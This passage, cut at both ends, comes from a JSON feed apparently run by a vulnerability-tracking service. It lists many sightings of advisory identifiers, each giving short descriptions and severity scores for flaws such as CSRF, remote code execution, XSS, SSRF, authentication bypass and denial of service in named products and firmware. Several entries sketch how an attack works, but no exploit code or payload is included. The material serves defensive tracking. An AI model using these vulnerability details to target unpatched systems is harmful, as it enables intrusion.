"content": "#ExploitObserverAlert\n\nGHSA-w244-m45p-g2fh\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-W244-M45P-G2FH. Cross-site request forgery (CSRF) vulnerability exists in FURUNO SYSTEMS wireless LAN access point devices. If a user views a malicious page while logged in, unintended operations may be performed. Affected products and versions are as follows: ACERA 1210 firmware ver.02.36 and earlier, ACERA 1150i firmware ver.01.35 and earlier, ACERA 1150w firmware ver.01.35 and earlier, ACERA 1110 firmware ver.01.76 and earlier, ACERA 1020 firmware ver.01.86 and earlier, ACERA 1010 firmware ver.01.86 and earlier, ACERA 950 firmware ver.01.60 and earlier, ACERA 850F firmware ver.01.60 and earlier, ACERA 900 firmware ver.02.54 and earlier, ACERA 850M firmware ver.02.06 and earlier, ACERA 810 firmware ver.03.74 and earlier, and ACERA 800ST firmware ver.07.35 and earlier. They are affected when running in ST(Standalone) mode.\n\nGHSS: 8.8", "creation_timestamp": "2023-11-30T19:31:03.000000Z"}, {"uuid": "e45fa2af-3ae6-4ba1-b6c3-ae715c397cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWW8-RH9F-5MJQ", "type": "seen", "source": "https://t.me/arpsyndicate/819", "content": "#ExploitObserverAlert\n\nGHSA-gww8-rh9f-5mjq\n\nDESCRIPTION: Exploit Observer has 22 entries related to GHSA-GWW8-RH9F-5MJQ. Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-30T10:32:24.000000Z"}, {"uuid": "10c315ee-6f8a-4e9e-886a-5f1836e3eed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WMMG-RJJC-VQH8", "type": "seen", "source": "https://t.me/arpsyndicate/791", "content": "#ExploitObserverAlert\n\nGHSA-wmmg-rjjc-vqh8\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-WMMG-RJJC-VQH8.\n\nGHSS: 5.5", "creation_timestamp": "2023-11-30T07:28:22.000000Z"}, {"uuid": "7f3b5f42-62da-4397-b16e-0ca1ef5a867c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6FG-M377-682M", "type": "seen", "source": "https://t.me/arpsyndicate/503", "content": "#ExploitObserverAlert\n\nGHSA-m6fg-m377-682m\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-M6FG-M377-682M. This High severity RCE (Remote Code Execution) vulnerability was introduced in version 3.4.6 of Crowd Data Center and Server.\n\nGHSS: 8.0", "creation_timestamp": "2023-11-23T14:12:25.000000Z"}, {"uuid": "bb7a8036-fb5d-4eed-9f3b-b1542b376477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J852-MP82-WV2G", "type": "seen", "source": "https://t.me/arpsyndicate/803", "content": "#ExploitObserverAlert\n\nGHSA-j852-mp82-wv2g\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-J852-MP82-WV2G.\n\nGHSS: 5.4", "creation_timestamp": "2023-11-30T08:40:05.000000Z"}, {"uuid": "bfaceb7f-7014-4a62-965c-4a8393e257dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38JP-HQG7-HHJ2", "type": "seen", "source": "https://t.me/arpsyndicate/801", "content": "#ExploitObserverAlert\n\nGHSA-38jp-hqg7-hhj2\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-38JP-HQG7-HHJ2. A Cross-Site Scripting (XSS) vulnerability has been found in Alumne LMS affecting version 4.0.0.1.08. An attacker could exploit the 'localidad' parameter to inject a custom JavaScript payload and partially take over another user's browser session, due to the lack of proper sanitisation of the 'localidad' field on the /users/editmy page.\n\nGHSS: 5.4", "creation_timestamp": "2023-11-30T08:27:33.000000Z"}, {"uuid": "dd05503d-ce6a-4a7b-b411-e01655d94c25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJ52-RQW6-XXQH", "type": "seen", "source": "https://t.me/arpsyndicate/800", "content": "#ExploitObserverAlert\n\nGHSA-gj52-rqw6-xxqh\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-GJ52-RQW6-XXQH. Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \\Wacom\\Wacom_Tablet.exe.\n\nGHSS: 5.9", "creation_timestamp": "2023-11-30T08:22:42.000000Z"}, {"uuid": "5930c172-f1bd-4cbf-94cd-7ef5ec4d3b72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-585G-F852-V6P4", "type": "seen", "source": "https://t.me/arpsyndicate/799", "content": "#ExploitObserverAlert\n\nGHSA-585g-f852-v6p4\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-585G-F852-V6P4. An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-30T08:18:10.000000Z"}, {"uuid": "e478efa8-692d-4255-ae4f-242bacc01337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X73W-G8HX-V7RP", "type": "seen", "source": "https://t.me/arpsyndicate/816", "content": "#ExploitObserverAlert\n\nGHSA-x73w-g8hx-v7rp\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-X73W-G8HX-V7RP. An issue was discovered in Electerm 1.3.22, allows attackers to execute arbitrary code via unverified request to electerms service.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-30T10:07:54.000000Z"}, {"uuid": "1fd88a21-e8c1-4d6c-a6e6-81c1ae04c0e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W4PV-P6XF-QC53", "type": "seen", "source": "https://t.me/arpsyndicate/1540", "content": "#ExploitObserverAlert\n\nGHSA-w4pv-p6xf-qc53\n\nDESCRIPTION: Exploit Observer has 119 entries related to GHSA-W4PV-P6XF-QC53.\n\nGHSS: 9.8", "creation_timestamp": "2023-12-07T23:50:43.000000Z"}, {"uuid": "84e0df83-da79-4f40-85e6-c02ac762d93a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP49-2G4R-M3X3", "type": "seen", "source": "https://t.me/arpsyndicate/735", "content": "#ExploitObserverAlert\n\nGHSA-vp49-2g4r-m3x3\n\nDESCRIPTION: Exploit Observer has 50 entries related to GHSA-VP49-2G4R-M3X3.\n\nGHSS: 6.5", "creation_timestamp": "2023-11-29T12:45:45.000000Z"}, {"uuid": "cb71a231-7534-4e1d-9ad5-753fc8c38872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXQV-R2CC-R9C9", "type": "seen", "source": "https://t.me/arpsyndicate/813", "content": "#ExploitObserverAlert\n\nGHSA-cxqv-r2cc-r9c9\n\nDESCRIPTION: Exploit Observer has 19 entries related to GHSA-CXQV-R2CC-R9C9. Improper input validation of octal strings in Python stdlib ipaddress 3.10 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many programs that rely on Python stdlib ipaddress. IP address octects are left stripped instead of evaluated as valid IP addresses.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-30T09:42:23.000000Z"}, {"uuid": "29fc9334-7a09-4e86-a503-01c807262a44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR7H-8PV2-XVX2", "type": "seen", "source": "https://t.me/arpsyndicate/811", "content": "#ExploitObserverAlert\n\nGHSA-qr7h-8pv2-xvx2\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-QR7H-8PV2-XVX2. ** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in yuan1994 tpAdmin 1.3.12. Affected is the function remote of the file application\\admin\\controller\\Upload.php. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225408. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\n\nGHSS: 4.9", "creation_timestamp": "2023-11-30T09:33:11.000000Z"}, {"uuid": "d43d6542-e78d-439b-a5ac-379b001686eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8PPF-X4GR-2X7G", "type": "seen", "source": "https://t.me/arpsyndicate/626", "content": "#ExploitObserverAlert\n\nGHSA-8ppf-x4gr-2x7g\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-8PPF-X4GR-2X7G.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-28T11:23:57.000000Z"}, {"uuid": "fb2c607a-b68c-4094-a607-28a544e9edf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J4PH-GQH2-8F93", "type": "seen", "source": "https://t.me/arpsyndicate/815", "content": "#ExploitObserverAlert\n\nGHSA-j4ph-gqh2-8f93\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-J4PH-GQH2-8F93. Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.\n\nGHSS: 3.5", "creation_timestamp": "2023-11-30T10:01:35.000000Z"}, {"uuid": "8fc50128-469a-4690-8d7f-b060a60bb560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M2PJ-MJHW-X9FM", "type": "seen", "source": "https://t.me/arpsyndicate/2880", "content": "#ExploitObserverAlert\n\nGHSA-m2pj-mjhw-x9fm\n\nDESCRIPTION: Exploit Observer has 7 entries in 2 file formats related to GHSA-M2PJ-MJHW-X9FM. An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.\n\nGHSS: 8.2", "creation_timestamp": "2024-01-16T19:58:12.000000Z"}, {"uuid": "ede12de1-a797-4a51-8e0b-357996d6b32f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5C8-RQWP-CP95", "type": "seen", "source": "https://t.me/arpsyndicate/2855", "content": "#ExploitObserverAlert\n\nGHSA-h5c8-rqwp-cp95\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-H5C8-RQWP-CP95. The xmlattr filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the xmlattr filter, and an application doing so should already be verifying what keys are provided regardless of this fix.\n\nGHSS: 5.4", "creation_timestamp": "2024-01-16T13:52:07.000000Z"}, {"uuid": "adb99ece-9637-4908-896e-e6b097c209f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G273-WPPX-82W4", "type": "seen", "source": "https://t.me/arpsyndicate/2828", "content": "#ExploitObserverAlert\n\nGHSA-g273-wppx-82w4\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-G273-WPPX-82W4. An authenticated and unauthorized user can access the GDPR data extraction feature and query over the information returned, leading to customer data exposure.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-16T05:25:44.000000Z"}, {"uuid": "eb21d4cc-82de-49c1-8af3-2bf47c8901da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H374-MM57-879C", "type": "seen", "source": "https://t.me/arpsyndicate/2794", "content": "#ExploitObserverAlert\n\nGHSA-h374-mm57-879c\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-H374-MM57-879C. The OrderAndPaginate function is used to order and paginate data. It is defined as follows:\n\nGHSS: 7.0", "creation_timestamp": "2024-01-15T16:02:09.000000Z"}, {"uuid": "65a0432f-485a-414f-b17b-9f76ca606b67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q84W-P2G5-RXW9", "type": "seen", "source": "https://t.me/arpsyndicate/624", "content": "#ExploitObserverAlert\n\nGHSA-q84w-p2g5-rxw9\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-Q84W-P2G5-RXW9. The Texas Instruments OMAP L138 (secure variants) trusted execution environment (TEE) lacks a bounds check on the signature size field in the SK_LOAD module loading routine, present in mask ROM. A module with a sufficiently large signature field causes a stack overflow, affecting secure kernel data pages. This can be leveraged to obtain arbitrary code execution in secure supervisor context by overwriting a SHA256 function pointer in the secure kernel data area when loading a forged, unsigned SK_LOAD module encrypted with the CEK (obtainable through CVE-2022-25332). This constitutes a full break of the TEE security architecture.\n\nGHSS: 8.2", "creation_timestamp": "2023-11-28T00:57:29.000000Z"}, {"uuid": "f8262b10-70d1-4628-9e55-3ab16bf4e8da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R48C-XM7Q-2F8V", "type": "seen", "source": "https://t.me/arpsyndicate/623", "content": "#ExploitObserverAlert\n\nGHSA-r48c-xm7q-2f8v\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-R48C-XM7Q-2F8V.", "creation_timestamp": "2023-11-28T00:42:03.000000Z"}, {"uuid": "fdbbe207-b4f7-4772-8288-8212b295893e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6CC-7WJ7-GFX2", "type": "seen", "source": "https://t.me/arpsyndicate/285", "content": "#ExploitObserverAlert\n\nGHSA-r6cc-7wj7-gfx2\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-R6CC-7WJ7-GFX2. Kubernetes is vulnerable to privilege escalation when a user that can create pods on Windows nodes running kubernetes-csi-proxy may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes running kubernetes-csi-proxy.\n\nGHSS: 8.8", "creation_timestamp": "2023-11-20T12:11:48.000000Z"}, {"uuid": "3f70e688-a7a6-4dbe-a657-9e402900bd93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q95J-488Q-5Q3P", "type": "seen", "source": "https://t.me/arpsyndicate/518", "content": "#ExploitObserverAlert\n\nGHSA-q95j-488q-5q3p\n\nDESCRIPTION: Exploit Observer has 42 entries related to GHSA-Q95J-488Q-5Q3P.\n\nGHSS: 6.5", "creation_timestamp": "2023-11-24T06:54:51.000000Z"}, {"uuid": "6eca5c43-1c4a-4077-826b-731dc6b0c9b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7QMP-RW6C-F6VW", "type": "seen", "source": "https://t.me/arpsyndicate/506", "content": "#ExploitObserverAlert\n\nGHSA-7qmp-rw6c-f6vw\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-7QMP-RW6C-F6VW. Buffer Overflow vulnerability in DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G V2.D1 v.23.08.23D1, and DI-7400G V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the wild/mx parameter of the ddns.asp function.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-23T14:27:30.000000Z"}, {"uuid": "80ca30c8-7db0-46d0-92d0-faf551639256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RC2-W7V5-6RGM", "type": "seen", "source": "https://t.me/arpsyndicate/504", "content": "#ExploitObserverAlert\n\nGHSA-5rc2-w7v5-6rgm\n\nDESCRIPTION: Exploit Observer has 15 entries related to GHSA-5RC2-W7V5-6RGM. An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1.", "creation_timestamp": "2023-11-23T14:17:25.000000Z"}, {"uuid": "a4017846-c1c5-45e9-a550-bc61fa7b2bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQV7-XC39-PH8V", "type": "seen", "source": "https://t.me/arpsyndicate/553", "content": "#ExploitObserverAlert\n\nGHSA-xqv7-xc39-ph8v\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-XQV7-XC39-PH8V. This High severity RCE (Remote Code Execution) vulnerability was introduced in versions 8.1.0, 8.2.0, 9.0.0, 9.1.0, 9.2.0, and 9.3.0 of Bamboo Data Center and Server.\n\nGHSS: 8.5", "creation_timestamp": "2023-11-24T23:49:46.000000Z"}, {"uuid": "1084c2f9-79c8-445a-9753-5a51cc8f785b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WH7-397J-722M", "type": "seen", "source": "https://t.me/arpsyndicate/317", "content": "#ExploitObserverAlert\n\nGHSA-9wh7-397j-722m\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-9WH7-397J-722M.\n\nGHSS: 6.0", "creation_timestamp": "2023-11-21T14:43:27.000000Z"}, {"uuid": "2cca9c6d-2970-46db-addd-3650f540caa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ42-V2P3-FQ2W", "type": "seen", "source": "https://t.me/arpsyndicate/316", "content": "#ExploitObserverAlert\n\nGHSA-wj42-v2p3-fq2w\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-WJ42-V2P3-FQ2W.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-21T14:43:25.000000Z"}, {"uuid": "9824e054-c6f2-4cca-ad60-bd5cf81b4ed1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QQVQ-6XGJ-JW8G", "type": "seen", "source": "https://t.me/arpsyndicate/313", "content": "#ExploitObserverAlert\n\nGHSA-qqvq-6xgj-jw8g\n\nDESCRIPTION: Exploit Observer has 16 entries related to GHSA-QQVQ-6XGJ-JW8G.\n\nGHSS: 8.8", "creation_timestamp": "2023-11-21T07:53:58.000000Z"}, {"uuid": "38c20b74-ded9-4268-a026-0e7a18632036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCJV-MGP8-QVMR", "type": "seen", "source": "https://t.me/arpsyndicate/306", "content": "#ExploitObserverAlert\n\nGHSA-rcjv-mgp8-qvmr\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-RCJV-MGP8-QVMR.\n\nGHSS: 7.5", "creation_timestamp": "2023-11-21T02:43:21.000000Z"}, {"uuid": "6cbbc711-7487-4d62-bcd3-e9a5670f8fa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P8VW-M6QQ-W42V", "type": "seen", "source": "https://t.me/arpsyndicate/302", "content": "#ExploitObserverAlert\n\nGHSA-p8vw-m6qq-w42v\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-P8VW-M6QQ-W42V. read_ints in plistlib.py in Python through 3.9.1 is vulnerable to a potential DoS attack via CPU and RAM exhaustion when processing malformed Apple Property List files in binary format.\n\nGHSS: 6.5", "creation_timestamp": "2023-11-20T16:54:21.000000Z"}, {"uuid": "369f2433-6d3f-43f7-9784-8973bc8e557d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2R3G-9RM8-7FV3", "type": "seen", "source": "https://t.me/arpsyndicate/361", "content": "#ExploitObserverAlert\n\nGHSA-2r3g-9rm8-7fv3\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-2R3G-9RM8-7FV3. The Prismatic WordPress plugin before 2.8 does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator", "creation_timestamp": "2023-11-22T17:36:42.000000Z"}, {"uuid": "efcefa28-78bf-4cf4-bd17-869bf256c2d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77PM-GXX7-5C5F", "type": "seen", "source": "https://t.me/arpsyndicate/360", "content": "#ExploitObserverAlert\n\nGHSA-77pm-gxx7-5c5f\n\nDESCRIPTION: Exploit Observer has 8 entries related to GHSA-77PM-GXX7-5C5F. A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability.\n\nGHSS: 7.0", "creation_timestamp": "2023-11-22T17:18:18.000000Z"}, {"uuid": "d799d008-21d8-4794-9a73-a8585ef50377", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P6J-M8J2-M6RC", "type": "seen", "source": "https://t.me/arpsyndicate/359", "content": "#ExploitObserverAlert\n\nGHSA-3p6j-m8j2-m6rc\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-3P6J-M8J2-M6RC. An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication for SAML Users can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/challenge endpoint. The correctness of the TOTP is not checked properly, and can be bypassed by passing any string as the backup code.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-22T17:10:36.000000Z"}, {"uuid": "5e0ba713-3142-4439-a758-e1795572e6ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3VMM-7H4J-69RM", "type": "seen", "source": "https://t.me/arpsyndicate/358", "content": "#ExploitObserverAlert\n\nGHSA-3vmm-7h4j-69rm\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-3VMM-7H4J-69RM. Given that there are at least two different sites in the same TYPO3 installation - for instance first.example.org and second.example.com - then a session cookie generated for the first site can be reused on the second site without requiring additional authentication.\n\nGHSS: 4.2", "creation_timestamp": "2023-11-22T17:01:12.000000Z"}, {"uuid": "0fee73f7-2824-4188-91a3-32e24665448e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4MP-V249-X3MH", "type": "seen", "source": "https://t.me/arpsyndicate/498", "content": "#ExploitObserverAlert\n\nGHSA-m4mp-v249-x3mh\n\nDESCRIPTION: Exploit Observer has 85 entries related to GHSA-M4MP-V249-X3MH. When a HTTP/2 stream was reset (RST frame) by a client, there was a time window were the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open and causing the memory footprint to keep on growing. On connection close, all resources were reclaimed, but the process might run out of memory before that.\n\nGHSS: 5.9", "creation_timestamp": "2023-11-23T13:49:41.000000Z"}, {"uuid": "60f0b9cc-c6fd-4c23-a354-9801ced76e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JQ9-2XHW-JPX7", "type": "seen", "source": "https://t.me/arpsyndicate/362", "content": "#ExploitObserverAlert\n\nGHSA-4jq9-2xhw-jpx7\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-4JQ9-2XHW-JPX7. A denial of service vulnerability in JSON-Java was discovered by ClusterFuzz.  A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using \\ to escape special characters, including \\ itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of \\ characters in the escaped string.", "creation_timestamp": "2023-11-22T17:42:16.000000Z"}, {"uuid": "f9866560-9e44-4d9a-aee3-36bfcba585e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XV9-423Q-X48X", "type": "seen", "source": "https://t.me/arpsyndicate/319", "content": "#ExploitObserverAlert\n\nGHSA-9xv9-423q-x48x\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-9XV9-423Q-X48X.\n\nGHSS: 7.3", "creation_timestamp": "2023-11-21T20:15:06.000000Z"}, {"uuid": "e0214471-76ee-4b48-bcd0-bf7b1d56d8e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P97H-9FXF-WPQ6", "type": "seen", "source": "https://t.me/arpsyndicate/301", "content": "#ExploitObserverAlert\n\nGHSA-p97h-9fxf-wpq6\n\nDESCRIPTION: Exploit Observer has 19 entries related to GHSA-P97H-9FXF-WPQ6. A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-20T16:46:39.000000Z"}, {"uuid": "bcec649d-e0fe-4c06-8330-6574c09c1fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MF3W-J4FP-PV84", "type": "seen", "source": "https://t.me/arpsyndicate/299", "content": "#ExploitObserverAlert\n\nGHSA-mf3w-j4fp-pv84\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-MF3W-J4FP-PV84. In MtpPropertyValue of MtpProperty.h, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\nGHSS: 7.8", "creation_timestamp": "2023-11-20T16:32:07.000000Z"}, {"uuid": "2597c1d3-7e42-4cab-8021-2031272e4bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JWFV-VJ48-P3XQ", "type": "seen", "source": "https://t.me/arpsyndicate/298", "content": "#ExploitObserverAlert\n\nGHSA-jwfv-vj48-p3xq\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-JWFV-VJ48-P3XQ. Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an Information Disclosure vulnerability. An unauthenticated attacker could leverage this vulnerability to obtain NTLMv2 credentials. Exploitation of this issue requires user interaction in that a victim must open a maliciously crafted Microsoft Office file, or visit an attacker controlled web page.\n\nGHSS: 5.5", "creation_timestamp": "2023-11-20T16:15:41.000000Z"}, {"uuid": "f59ffcff-3be2-4399-b634-0c6b7a952482", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 